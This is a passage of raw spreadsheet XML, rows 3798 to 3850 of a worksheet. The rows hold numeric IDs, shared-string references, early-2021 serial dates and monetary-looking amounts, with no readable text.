      </c>
    </row>
    <row r="3798" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3798">
        <v>24070</v>
      </c>
      <c r="B3798">
        <v>485</v>
      </c>
      <c r="C3798" t="s">
        <v>2182</v>
      </c>
      <c r="D3798" t="s">
        <v>13067</v>
      </c>
      <c r="E3798">
        <v>29</v>
      </c>
      <c r="F3798" t="s">
        <v>9595</v>
      </c>
      <c r="G3798" s="1">
        <v>44267</v>
      </c>
      <c r="H3798">
        <v>1000</v>
      </c>
      <c r="J3798" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3799" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3799">
        <v>24071</v>
      </c>
      <c r="B3799">
        <v>485</v>
      </c>
      <c r="C3799" t="s">
        <v>2182</v>
      </c>
      <c r="D3799" t="s">
        <v>13067</v>
      </c>
      <c r="E3799">
        <v>29</v>
      </c>
      <c r="F3799" t="s">
        <v>9217</v>
      </c>
      <c r="G3799" s="1">
        <v>44267</v>
      </c>
      <c r="H3799">
        <v>1000</v>
      </c>
      <c r="J3799" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3800" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3800">
        <v>24072</v>
      </c>
      <c r="B3800">
        <v>485</v>
      </c>
      <c r="C3800" t="s">
        <v>2182</v>
      </c>
      <c r="D3800" t="s">
        <v>13067</v>
      </c>
      <c r="E3800">
        <v>29</v>
      </c>
      <c r="F3800" t="s">
        <v>9523</v>
      </c>
      <c r="G3800" s="1">
        <v>44267</v>
      </c>
      <c r="H3800">
        <v>1000</v>
      </c>
      <c r="J3800" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3801" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3801">
        <v>24073</v>
      </c>
      <c r="B3801">
        <v>485</v>
      </c>
      <c r="C3801" t="s">
        <v>2182</v>
      </c>
      <c r="D3801" t="s">
        <v>13067</v>
      </c>
      <c r="E3801">
        <v>29</v>
      </c>
      <c r="F3801" t="s">
        <v>9675</v>
      </c>
      <c r="G3801" s="1">
        <v>44267</v>
      </c>
      <c r="H3801">
        <v>1000</v>
      </c>
      <c r="J3801" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3802" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3802">
        <v>24079</v>
      </c>
      <c r="B3802">
        <v>1639</v>
      </c>
      <c r="C3802" t="s">
        <v>2812</v>
      </c>
      <c r="D3802" t="s">
        <v>10329</v>
      </c>
      <c r="E3802">
        <v>17</v>
      </c>
      <c r="F3802" t="s">
        <v>13074</v>
      </c>
      <c r="G3802" s="1">
        <v>44253</v>
      </c>
      <c r="H3802">
        <v>312000</v>
      </c>
      <c r="J3802" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3803" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3803">
        <v>24080</v>
      </c>
      <c r="B3803">
        <v>5276</v>
      </c>
      <c r="C3803" t="s">
        <v>8515</v>
      </c>
      <c r="D3803" t="s">
        <v>13075</v>
      </c>
      <c r="E3803">
        <v>4</v>
      </c>
      <c r="F3803" t="s">
        <v>13076</v>
      </c>
      <c r="G3803" s="1">
        <v>44225</v>
      </c>
      <c r="H3803">
        <v>2400</v>
      </c>
      <c r="I3803" t="s">
        <v>13057</v>
      </c>
    </row>
    <row r="3804" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3804">
        <v>24082</v>
      </c>
      <c r="B3804">
        <v>5276</v>
      </c>
      <c r="C3804" t="s">
        <v>8515</v>
      </c>
      <c r="D3804" t="s">
        <v>13075</v>
      </c>
      <c r="E3804">
        <v>4</v>
      </c>
      <c r="F3804" t="s">
        <v>9792</v>
      </c>
      <c r="G3804" s="1">
        <v>44225</v>
      </c>
      <c r="H3804">
        <v>60</v>
      </c>
      <c r="I3804" t="s">
        <v>13057</v>
      </c>
    </row>
    <row r="3805" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3805">
        <v>24083</v>
      </c>
      <c r="B3805">
        <v>5276</v>
      </c>
      <c r="C3805" t="s">
        <v>8515</v>
      </c>
      <c r="D3805" t="s">
        <v>13075</v>
      </c>
      <c r="E3805">
        <v>4</v>
      </c>
      <c r="F3805" t="s">
        <v>13077</v>
      </c>
      <c r="G3805" s="1">
        <v>44225</v>
      </c>
      <c r="H3805">
        <v>2400</v>
      </c>
      <c r="I3805" t="s">
        <v>13057</v>
      </c>
    </row>
    <row r="3806" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3806">
        <v>24087</v>
      </c>
      <c r="B3806">
        <v>966</v>
      </c>
      <c r="C3806" t="s">
        <v>3854</v>
      </c>
      <c r="D3806" t="s">
        <v>13078</v>
      </c>
      <c r="E3806">
        <v>16</v>
      </c>
      <c r="F3806" t="s">
        <v>364</v>
      </c>
      <c r="G3806" s="1">
        <v>44287</v>
      </c>
      <c r="H3806">
        <v>2400000</v>
      </c>
      <c r="I3806" t="s">
        <v>13079</v>
      </c>
      <c r="J3806" t="s">
        <v>13080</v>
      </c>
    </row>
    <row r="3807" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3807">
        <v>24088</v>
      </c>
      <c r="B3807">
        <v>29</v>
      </c>
      <c r="C3807" t="s">
        <v>1899</v>
      </c>
      <c r="D3807" t="s">
        <v>13081</v>
      </c>
      <c r="E3807">
        <v>17</v>
      </c>
      <c r="F3807" t="s">
        <v>13082</v>
      </c>
      <c r="G3807" s="1">
        <v>44293</v>
      </c>
      <c r="H3807">
        <v>48000</v>
      </c>
      <c r="J3807" t="s">
        <v>12821</v>
      </c>
    </row>
    <row r="3808" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3808">
        <v>24089</v>
      </c>
      <c r="B3808">
        <v>29</v>
      </c>
      <c r="C3808" t="s">
        <v>1899</v>
      </c>
      <c r="D3808" t="s">
        <v>13081</v>
      </c>
      <c r="E3808">
        <v>17</v>
      </c>
      <c r="F3808" t="s">
        <v>9454</v>
      </c>
      <c r="G3808" s="1">
        <v>44293</v>
      </c>
      <c r="H3808">
        <v>24000</v>
      </c>
      <c r="J3808" t="s">
        <v>12821</v>
      </c>
    </row>
    <row r="3809" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3809">
        <v>24090</v>
      </c>
      <c r="B3809">
        <v>29</v>
      </c>
      <c r="C3809" t="s">
        <v>1899</v>
      </c>
      <c r="D3809" t="s">
        <v>13081</v>
      </c>
      <c r="E3809">
        <v>17</v>
      </c>
      <c r="F3809" t="s">
        <v>7211</v>
      </c>
      <c r="G3809" s="1">
        <v>44293</v>
      </c>
      <c r="H3809">
        <v>12000</v>
      </c>
      <c r="J3809" t="s">
        <v>12821</v>
      </c>
    </row>
    <row r="3810" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3810">
        <v>24091</v>
      </c>
      <c r="B3810">
        <v>29</v>
      </c>
      <c r="C3810" t="s">
        <v>1899</v>
      </c>
      <c r="D3810" t="s">
        <v>13081</v>
      </c>
      <c r="E3810">
        <v>17</v>
      </c>
      <c r="F3810" t="s">
        <v>13083</v>
      </c>
      <c r="G3810" s="1">
        <v>44293</v>
      </c>
      <c r="H3810">
        <v>12000</v>
      </c>
      <c r="J3810" t="s">
        <v>12821</v>
      </c>
    </row>
    <row r="3811" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3811">
        <v>24095</v>
      </c>
      <c r="B3811">
        <v>1939</v>
      </c>
      <c r="C3811" t="s">
        <v>6423</v>
      </c>
      <c r="D3811" t="s">
        <v>13084</v>
      </c>
      <c r="E3811">
        <v>26</v>
      </c>
      <c r="F3811" t="s">
        <v>364</v>
      </c>
      <c r="G3811" s="1">
        <v>44280</v>
      </c>
      <c r="H3811">
        <v>200000</v>
      </c>
      <c r="I3811" t="s">
        <v>9536</v>
      </c>
      <c r="J3811" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3812" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3812">
        <v>24096</v>
      </c>
      <c r="B3812">
        <v>495</v>
      </c>
      <c r="C3812" t="s">
        <v>16517</v>
      </c>
      <c r="D3812" t="s">
        <v>16518</v>
      </c>
      <c r="E3812">
        <v>26</v>
      </c>
      <c r="F3812" t="s">
        <v>9527</v>
      </c>
      <c r="G3812" s="1">
        <v>44267</v>
      </c>
      <c r="H3812" s="4">
        <v>200000</v>
      </c>
      <c r="J3812" t="s">
        <v>13085</v>
      </c>
    </row>
    <row r="3813" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3813">
        <v>24097</v>
      </c>
      <c r="B3813">
        <v>495</v>
      </c>
      <c r="C3813" t="s">
        <v>16517</v>
      </c>
      <c r="D3813" t="s">
        <v>16519</v>
      </c>
      <c r="E3813">
        <v>26</v>
      </c>
      <c r="F3813" t="s">
        <v>13086</v>
      </c>
      <c r="G3813" s="1">
        <v>44267</v>
      </c>
      <c r="H3813" s="4">
        <v>200000</v>
      </c>
      <c r="J3813" t="s">
        <v>13087</v>
      </c>
    </row>
    <row r="3814" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3814">
        <v>24098</v>
      </c>
      <c r="B3814">
        <v>5296</v>
      </c>
      <c r="C3814" t="s">
        <v>8506</v>
      </c>
      <c r="D3814" t="s">
        <v>13068</v>
      </c>
      <c r="E3814">
        <v>14</v>
      </c>
      <c r="F3814" t="s">
        <v>11443</v>
      </c>
      <c r="G3814" s="1">
        <v>44280</v>
      </c>
      <c r="H3814">
        <v>2000</v>
      </c>
      <c r="I3814" t="s">
        <v>13088</v>
      </c>
    </row>
    <row r="3815" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3815">
        <v>24099</v>
      </c>
      <c r="B3815">
        <v>5296</v>
      </c>
      <c r="C3815" t="s">
        <v>8506</v>
      </c>
      <c r="D3815" t="s">
        <v>13068</v>
      </c>
      <c r="E3815">
        <v>14</v>
      </c>
      <c r="F3815" t="s">
        <v>9855</v>
      </c>
      <c r="G3815" s="1">
        <v>44280</v>
      </c>
      <c r="H3815">
        <v>2000</v>
      </c>
      <c r="I3815" t="s">
        <v>13088</v>
      </c>
    </row>
    <row r="3816" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3816">
        <v>24100</v>
      </c>
      <c r="B3816">
        <v>5296</v>
      </c>
      <c r="C3816" t="s">
        <v>8506</v>
      </c>
      <c r="D3816" t="s">
        <v>13068</v>
      </c>
      <c r="E3816">
        <v>14</v>
      </c>
      <c r="F3816" t="s">
        <v>10421</v>
      </c>
      <c r="G3816" s="1">
        <v>44280</v>
      </c>
      <c r="H3816">
        <v>500</v>
      </c>
      <c r="I3816" t="s">
        <v>13089</v>
      </c>
    </row>
    <row r="3817" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3817">
        <v>24106</v>
      </c>
      <c r="B3817">
        <v>5305</v>
      </c>
      <c r="C3817" t="s">
        <v>6415</v>
      </c>
      <c r="D3817" t="s">
        <v>13090</v>
      </c>
      <c r="E3817">
        <v>4</v>
      </c>
      <c r="F3817" t="s">
        <v>3814</v>
      </c>
      <c r="G3817" s="1">
        <v>44225</v>
      </c>
      <c r="H3817">
        <v>144000</v>
      </c>
      <c r="J3817" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3818" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3818">
        <v>24107</v>
      </c>
      <c r="B3818">
        <v>5305</v>
      </c>
      <c r="C3818" t="s">
        <v>6415</v>
      </c>
      <c r="D3818" t="s">
        <v>13090</v>
      </c>
      <c r="E3818">
        <v>4</v>
      </c>
      <c r="F3818" t="s">
        <v>9640</v>
      </c>
      <c r="G3818" s="1">
        <v>44225</v>
      </c>
      <c r="H3818">
        <v>144000</v>
      </c>
      <c r="J3818" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3819" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3819">
        <v>24108</v>
      </c>
      <c r="B3819">
        <v>5305</v>
      </c>
      <c r="C3819" t="s">
        <v>6415</v>
      </c>
      <c r="D3819" t="s">
        <v>13090</v>
      </c>
      <c r="E3819">
        <v>4</v>
      </c>
      <c r="F3819" t="s">
        <v>13091</v>
      </c>
      <c r="G3819" s="1">
        <v>44225</v>
      </c>
      <c r="H3819">
        <v>720000</v>
      </c>
      <c r="J3819" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3820" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3820">
        <v>24109</v>
      </c>
      <c r="B3820">
        <v>5305</v>
      </c>
      <c r="C3820" t="s">
        <v>6415</v>
      </c>
      <c r="D3820" t="s">
        <v>13090</v>
      </c>
      <c r="E3820">
        <v>4</v>
      </c>
      <c r="F3820" t="s">
        <v>13092</v>
      </c>
      <c r="G3820" s="1">
        <v>44225</v>
      </c>
      <c r="H3820">
        <v>1152000</v>
      </c>
      <c r="J3820" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3821" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3821">
        <v>24110</v>
      </c>
      <c r="B3821">
        <v>5124</v>
      </c>
      <c r="C3821" t="s">
        <v>8523</v>
      </c>
      <c r="D3821" t="s">
        <v>13093</v>
      </c>
      <c r="E3821">
        <v>33</v>
      </c>
      <c r="F3821" t="s">
        <v>9590</v>
      </c>
      <c r="G3821" s="1">
        <v>44242</v>
      </c>
      <c r="H3821">
        <v>8000</v>
      </c>
      <c r="I3821" t="s">
        <v>12411</v>
      </c>
      <c r="J3821" t="s">
        <v>13094</v>
      </c>
    </row>
    <row r="3822" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3822">
        <v>24111</v>
      </c>
      <c r="B3822">
        <v>5124</v>
      </c>
      <c r="C3822" t="s">
        <v>8523</v>
      </c>
      <c r="D3822" t="s">
        <v>13093</v>
      </c>
      <c r="E3822">
        <v>33</v>
      </c>
      <c r="F3822" t="s">
        <v>9585</v>
      </c>
      <c r="G3822" s="1">
        <v>44242</v>
      </c>
      <c r="H3822">
        <v>8000</v>
      </c>
    </row>
    <row r="3823" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3823">
        <v>24112</v>
      </c>
      <c r="B3823">
        <v>5247</v>
      </c>
      <c r="C3823" t="s">
        <v>8531</v>
      </c>
      <c r="D3823" t="s">
        <v>13095</v>
      </c>
      <c r="E3823">
        <v>13</v>
      </c>
      <c r="F3823" t="s">
        <v>2407</v>
      </c>
      <c r="G3823" s="1">
        <v>44258</v>
      </c>
      <c r="H3823">
        <v>190000</v>
      </c>
      <c r="J3823" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3824" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3824">
        <v>24113</v>
      </c>
      <c r="B3824">
        <v>5247</v>
      </c>
      <c r="C3824" t="s">
        <v>8531</v>
      </c>
      <c r="D3824" t="s">
        <v>13095</v>
      </c>
      <c r="E3824">
        <v>13</v>
      </c>
      <c r="F3824" t="s">
        <v>9670</v>
      </c>
      <c r="G3824" s="1">
        <v>44258</v>
      </c>
      <c r="H3824">
        <v>5000</v>
      </c>
      <c r="J3824" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3825" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3825">
        <v>24114</v>
      </c>
      <c r="B3825">
        <v>5247</v>
      </c>
      <c r="C3825" t="s">
        <v>8531</v>
      </c>
      <c r="D3825" t="s">
        <v>13095</v>
      </c>
      <c r="E3825">
        <v>13</v>
      </c>
      <c r="F3825" t="s">
        <v>13096</v>
      </c>
      <c r="G3825" s="1">
        <v>44258</v>
      </c>
      <c r="H3825">
        <v>20000</v>
      </c>
      <c r="J3825" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3826" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3826">
        <v>24115</v>
      </c>
      <c r="B3826">
        <v>5247</v>
      </c>
      <c r="C3826" t="s">
        <v>8531</v>
      </c>
      <c r="D3826" t="s">
        <v>13095</v>
      </c>
      <c r="E3826">
        <v>13</v>
      </c>
      <c r="F3826" t="s">
        <v>13097</v>
      </c>
      <c r="G3826" s="1">
        <v>44258</v>
      </c>
      <c r="H3826">
        <v>50000</v>
      </c>
      <c r="J3826" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3827" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3827">
        <v>24116</v>
      </c>
      <c r="B3827">
        <v>5247</v>
      </c>
      <c r="C3827" t="s">
        <v>8531</v>
      </c>
      <c r="D3827" t="s">
        <v>13095</v>
      </c>
      <c r="E3827">
        <v>13</v>
      </c>
      <c r="F3827" t="s">
        <v>9437</v>
      </c>
      <c r="G3827" s="1">
        <v>44258</v>
      </c>
      <c r="H3827">
        <v>20000</v>
      </c>
      <c r="J3827" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3828" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3828">
        <v>24117</v>
      </c>
      <c r="B3828">
        <v>5247</v>
      </c>
      <c r="C3828" t="s">
        <v>8531</v>
      </c>
      <c r="D3828" t="s">
        <v>13095</v>
      </c>
      <c r="E3828">
        <v>13</v>
      </c>
      <c r="F3828" t="s">
        <v>673</v>
      </c>
      <c r="G3828" s="1">
        <v>44258</v>
      </c>
      <c r="H3828">
        <v>7000</v>
      </c>
      <c r="J3828" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3829" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3829">
        <v>24118</v>
      </c>
      <c r="B3829">
        <v>1391</v>
      </c>
      <c r="C3829" t="s">
        <v>4269</v>
      </c>
      <c r="D3829" t="s">
        <v>13098</v>
      </c>
      <c r="E3829">
        <v>9</v>
      </c>
      <c r="F3829" t="s">
        <v>1276</v>
      </c>
      <c r="G3829" s="1">
        <v>44258</v>
      </c>
      <c r="H3829">
        <v>2000</v>
      </c>
      <c r="I3829" t="s">
        <v>10448</v>
      </c>
    </row>
    <row r="3830" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3830">
        <v>24119</v>
      </c>
      <c r="B3830">
        <v>1391</v>
      </c>
      <c r="C3830" t="s">
        <v>4269</v>
      </c>
      <c r="D3830" t="s">
        <v>13098</v>
      </c>
      <c r="E3830">
        <v>9</v>
      </c>
      <c r="F3830" t="s">
        <v>6569</v>
      </c>
      <c r="G3830" s="1">
        <v>44258</v>
      </c>
      <c r="H3830">
        <v>6000</v>
      </c>
      <c r="I3830" t="s">
        <v>10448</v>
      </c>
      <c r="J3830" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3831" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3831">
        <v>24120</v>
      </c>
      <c r="B3831">
        <v>594</v>
      </c>
      <c r="C3831" t="s">
        <v>1640</v>
      </c>
      <c r="D3831" t="s">
        <v>13099</v>
      </c>
      <c r="E3831">
        <v>14</v>
      </c>
      <c r="F3831" t="s">
        <v>13100</v>
      </c>
      <c r="G3831" s="1">
        <v>44300</v>
      </c>
      <c r="H3831">
        <v>250000</v>
      </c>
      <c r="J3831" t="s">
        <v>13101</v>
      </c>
    </row>
    <row r="3832" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3832">
        <v>24121</v>
      </c>
      <c r="B3832">
        <v>594</v>
      </c>
      <c r="C3832" t="s">
        <v>1640</v>
      </c>
      <c r="D3832" t="s">
        <v>13099</v>
      </c>
      <c r="E3832">
        <v>14</v>
      </c>
      <c r="F3832" t="s">
        <v>13102</v>
      </c>
      <c r="G3832" s="1">
        <v>44300</v>
      </c>
      <c r="H3832">
        <v>250000</v>
      </c>
      <c r="J3832" t="s">
        <v>13103</v>
      </c>
    </row>
    <row r="3833" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3833">
        <v>24122</v>
      </c>
      <c r="B3833">
        <v>594</v>
      </c>
      <c r="C3833" t="s">
        <v>1640</v>
      </c>
      <c r="D3833" t="s">
        <v>13099</v>
      </c>
      <c r="E3833">
        <v>14</v>
      </c>
      <c r="F3833" t="s">
        <v>9437</v>
      </c>
      <c r="G3833" s="1">
        <v>44300</v>
      </c>
      <c r="H3833">
        <v>250000</v>
      </c>
      <c r="J3833" t="s">
        <v>13103</v>
      </c>
    </row>
    <row r="3834" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3834">
        <v>24123</v>
      </c>
      <c r="B3834">
        <v>594</v>
      </c>
      <c r="C3834" t="s">
        <v>1640</v>
      </c>
      <c r="D3834" t="s">
        <v>13099</v>
      </c>
      <c r="E3834">
        <v>14</v>
      </c>
      <c r="F3834" t="s">
        <v>1746</v>
      </c>
      <c r="G3834" s="1">
        <v>44300</v>
      </c>
      <c r="H3834">
        <v>250000</v>
      </c>
      <c r="J3834" t="s">
        <v>13103</v>
      </c>
    </row>
    <row r="3835" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3835">
        <v>24124</v>
      </c>
      <c r="B3835">
        <v>594</v>
      </c>
      <c r="C3835" t="s">
        <v>1640</v>
      </c>
      <c r="D3835" t="s">
        <v>13099</v>
      </c>
      <c r="E3835">
        <v>14</v>
      </c>
      <c r="F3835" t="s">
        <v>9435</v>
      </c>
      <c r="G3835" s="1">
        <v>44300</v>
      </c>
      <c r="H3835">
        <v>250000</v>
      </c>
      <c r="J3835" t="s">
        <v>13103</v>
      </c>
    </row>
    <row r="3836" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3836">
        <v>24126</v>
      </c>
      <c r="B3836">
        <v>5288</v>
      </c>
      <c r="C3836" t="s">
        <v>8429</v>
      </c>
      <c r="D3836" t="s">
        <v>13104</v>
      </c>
      <c r="E3836">
        <v>12</v>
      </c>
      <c r="F3836" t="s">
        <v>9437</v>
      </c>
      <c r="G3836" s="1">
        <v>44278</v>
      </c>
      <c r="H3836">
        <v>25000</v>
      </c>
      <c r="J3836" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="3837" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3837">
        <v>24127</v>
      </c>
      <c r="B3837">
        <v>5288</v>
      </c>
      <c r="C3837" t="s">
        <v>8429</v>
      </c>
      <c r="D3837" t="s">
        <v>13104</v>
      </c>
      <c r="E3837">
        <v>12</v>
      </c>
      <c r="F3837" t="s">
        <v>13106</v>
      </c>
      <c r="G3837" s="1">
        <v>44278</v>
      </c>
      <c r="H3837">
        <v>75000</v>
      </c>
      <c r="J3837" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="3838" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3838">
        <v>24128</v>
      </c>
      <c r="B3838">
        <v>5288</v>
      </c>
      <c r="C3838" t="s">
        <v>8429</v>
      </c>
      <c r="D3838" t="s">
        <v>13104</v>
      </c>
      <c r="E3838">
        <v>12</v>
      </c>
      <c r="F3838" t="s">
        <v>13107</v>
      </c>
      <c r="G3838" s="1">
        <v>44278</v>
      </c>
      <c r="H3838">
        <v>1980000</v>
      </c>
      <c r="I3838" t="s">
        <v>13108</v>
      </c>
      <c r="J3838" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="3839" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3839">
        <v>24129</v>
      </c>
      <c r="B3839">
        <v>5288</v>
      </c>
      <c r="C3839" t="s">
        <v>8429</v>
      </c>
      <c r="D3839" t="s">
        <v>13104</v>
      </c>
      <c r="E3839">
        <v>12</v>
      </c>
      <c r="F3839" t="s">
        <v>9595</v>
      </c>
      <c r="G3839" s="1">
        <v>44278</v>
      </c>
      <c r="H3839">
        <v>5000</v>
      </c>
      <c r="I3839" t="s">
        <v>9550</v>
      </c>
      <c r="J3839" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="3840" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3840">
        <v>24130</v>
      </c>
      <c r="B3840">
        <v>5288</v>
      </c>
      <c r="C3840" t="s">
        <v>8429</v>
      </c>
      <c r="D3840" t="s">
        <v>13109</v>
      </c>
      <c r="E3840">
        <v>12</v>
      </c>
      <c r="F3840" t="s">
        <v>1746</v>
      </c>
      <c r="G3840" s="1">
        <v>44278</v>
      </c>
      <c r="H3840">
        <v>25000</v>
      </c>
      <c r="J3840" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="3841" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3841">
        <v>24131</v>
      </c>
      <c r="B3841">
        <v>80</v>
      </c>
      <c r="C3841" t="s">
        <v>1543</v>
      </c>
      <c r="D3841" t="s">
        <v>11197</v>
      </c>
      <c r="E3841">
        <v>12</v>
      </c>
      <c r="F3841" t="s">
        <v>9437</v>
      </c>
      <c r="G3841" s="1">
        <v>44265</v>
      </c>
      <c r="H3841">
        <v>500000</v>
      </c>
      <c r="I3841" t="s">
        <v>9550</v>
      </c>
      <c r="J3841" t="s">
        <v>13110</v>
      </c>
    </row>
    <row r="3842" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3842">
        <v>24132</v>
      </c>
      <c r="B3842">
        <v>5288</v>
      </c>
      <c r="C3842" t="s">
        <v>8429</v>
      </c>
      <c r="D3842" t="s">
        <v>13104</v>
      </c>
      <c r="E3842">
        <v>12</v>
      </c>
      <c r="F3842" t="s">
        <v>9459</v>
      </c>
      <c r="G3842" s="1">
        <v>44278</v>
      </c>
      <c r="H3842">
        <v>5000</v>
      </c>
      <c r="J3842" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="3843" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3843">
        <v>24133</v>
      </c>
      <c r="B3843">
        <v>5288</v>
      </c>
      <c r="C3843" t="s">
        <v>8429</v>
      </c>
      <c r="D3843" t="s">
        <v>13109</v>
      </c>
      <c r="E3843">
        <v>12</v>
      </c>
      <c r="F3843" t="s">
        <v>3814</v>
      </c>
      <c r="G3843" s="1">
        <v>44278</v>
      </c>
      <c r="H3843">
        <v>5000</v>
      </c>
      <c r="J3843" t="s">
        <v>13111</v>
      </c>
    </row>
    <row r="3844" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3844">
        <v>24134</v>
      </c>
      <c r="B3844">
        <v>80</v>
      </c>
      <c r="C3844" t="s">
        <v>1543</v>
      </c>
      <c r="D3844" t="s">
        <v>11197</v>
      </c>
      <c r="E3844">
        <v>12</v>
      </c>
      <c r="F3844" t="s">
        <v>13112</v>
      </c>
      <c r="G3844" s="1">
        <v>44265</v>
      </c>
      <c r="H3844">
        <v>100000</v>
      </c>
      <c r="I3844" t="s">
        <v>9550</v>
      </c>
      <c r="J3844" t="s">
        <v>13113</v>
      </c>
    </row>
    <row r="3845" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3845">
        <v>24135</v>
      </c>
      <c r="B3845">
        <v>5288</v>
      </c>
      <c r="C3845" t="s">
        <v>8429</v>
      </c>
      <c r="D3845" t="s">
        <v>13104</v>
      </c>
      <c r="E3845">
        <v>12</v>
      </c>
      <c r="F3845" t="s">
        <v>9435</v>
      </c>
      <c r="G3845" s="1">
        <v>44278</v>
      </c>
      <c r="H3845">
        <v>15000</v>
      </c>
      <c r="J3845" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="3846" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3846">
        <v>24136</v>
      </c>
      <c r="B3846">
        <v>80</v>
      </c>
      <c r="C3846" t="s">
        <v>1543</v>
      </c>
      <c r="D3846" t="s">
        <v>11197</v>
      </c>
      <c r="E3846">
        <v>12</v>
      </c>
      <c r="F3846" t="s">
        <v>9595</v>
      </c>
      <c r="G3846" s="1">
        <v>44265</v>
      </c>
      <c r="H3846">
        <v>50000</v>
      </c>
      <c r="I3846" t="s">
        <v>9550</v>
      </c>
      <c r="J3846" t="s">
        <v>11198</v>
      </c>
    </row>
    <row r="3847" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3847">
        <v>24137</v>
      </c>
      <c r="B3847">
        <v>80</v>
      </c>
      <c r="C3847" t="s">
        <v>1543</v>
      </c>
      <c r="D3847" t="s">
        <v>11197</v>
      </c>
      <c r="E3847">
        <v>12</v>
      </c>
      <c r="F3847" t="s">
        <v>1746</v>
      </c>
      <c r="G3847" s="1">
        <v>44265</v>
      </c>
      <c r="H3847">
        <v>200000</v>
      </c>
      <c r="I3847" t="s">
        <v>9550</v>
      </c>
      <c r="J3847" t="s">
        <v>13114</v>
      </c>
    </row>
    <row r="3848" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3848">
        <v>24138</v>
      </c>
      <c r="B3848">
        <v>80</v>
      </c>
      <c r="C3848" t="s">
        <v>1543</v>
      </c>
      <c r="D3848" t="s">
        <v>11197</v>
      </c>
      <c r="E3848">
        <v>12</v>
      </c>
      <c r="F3848" t="s">
        <v>13115</v>
      </c>
      <c r="G3848" s="1">
        <v>44265</v>
      </c>
      <c r="H3848">
        <v>500000</v>
      </c>
      <c r="I3848" t="s">
        <v>9550</v>
      </c>
      <c r="J3848" t="s">
        <v>13116</v>
      </c>
    </row>
    <row r="3849" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3849">
        <v>24139</v>
      </c>
      <c r="B3849">
        <v>80</v>
      </c>
      <c r="C3849" t="s">
        <v>1543</v>
      </c>
      <c r="D3849" t="s">
        <v>11197</v>
      </c>
      <c r="E3849">
        <v>12</v>
      </c>
      <c r="F3849" t="s">
        <v>2236</v>
      </c>
      <c r="G3849" s="1">
        <v>44265</v>
      </c>
      <c r="H3849">
        <v>50000</v>
      </c>
      <c r="I3849" t="s">
        <v>9550</v>
      </c>
      <c r="J3849" t="s">
        <v>13117</v>
      </c>
    </row>
    <row r="3850" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3850">
        <v>24140</v>
      </c>
      <c r="B3850">
        <v>80</v>
      </c>
      <c r="C3850" t="s">
        <v>1543</v>
      </c>
      <c r="D3850" t="s">
